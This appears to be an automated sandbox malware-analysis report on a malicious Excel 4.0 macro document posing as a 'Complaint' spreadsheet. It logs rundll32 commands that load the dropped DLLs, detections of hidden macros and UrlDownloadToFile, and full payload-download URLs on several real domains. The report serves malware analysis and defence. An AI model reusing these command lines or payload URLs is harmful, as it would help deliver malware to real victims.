Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000005.00000002.268034364.0000000003430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.296266469.0000000002B10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.290090163.0000000002C10000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.284917168.00000000045B0000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.277650679.00000000048B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Complaint-1992179913-02182021.xls, type: SAMPLE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356738 Sample: Complaint-1992179913-02182021.xls Startdate: 23/02/2021 Architecture: WINDOWS Score: 84 27 Antivirus detection for URL or domain 2->27 29 Found malicious Excel 4.0 Macro 2->29 31 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->31 33 3 other signatures 2->33 6 EXCEL.EXE 31 55 2->6         started        process3 dnsIp4 21 pathinanchilearthmovers.com 162.241.80.6, 49719, 80 UNIFIEDLAYER-AS-1US United States 6->21 23 crt.sectigo.com 91.199.212.52, 49723, 80 SECTIGOGB United Kingdom 6->23 25 2 other IPs or domains 6->25 19 C:\...\Complaint-1992179913-02182021.xls.LNK, MS 6->19 dropped 35 Document exploit detected (process start blacklist hit) 6->35 37 Document exploit detected (UrlDownloadToFile) 6->37 11 rundll32.exe 6->11         started        13 rundll32.exe 6->13         started        15 rundll32.exe 6->15         started        17 2 other processes 6->17 file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.241.80.6
unknown United States
46606 UNIFIEDLAYER-AS-1US false
138.36.237.100
unknown Argentina
27823 DattateccomAR false
91.199.212.52
unknown United Kingdom
48447 SECTIGOGB false
72.52.227.180
unknown United States
32244 LIQUIDWEBUS false

Contacted Domains

Name IP Active
rzminc.com 72.52.227.180 true
crt.sectigo.com 91.199.212.52 true
jugueterialatorre.com.ar 138.36.237.100 true
pathinanchilearthmovers.com 162.241.80.6 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://rzminc.com/fdzgprclatqo/44250666589120400000.dat false
  • Avira URL Cloud: safe
unknown
http://pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat true
  • Avira URL Cloud: malware
unknown
http://jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat false
  • Avira URL Cloud: safe
unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt false
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown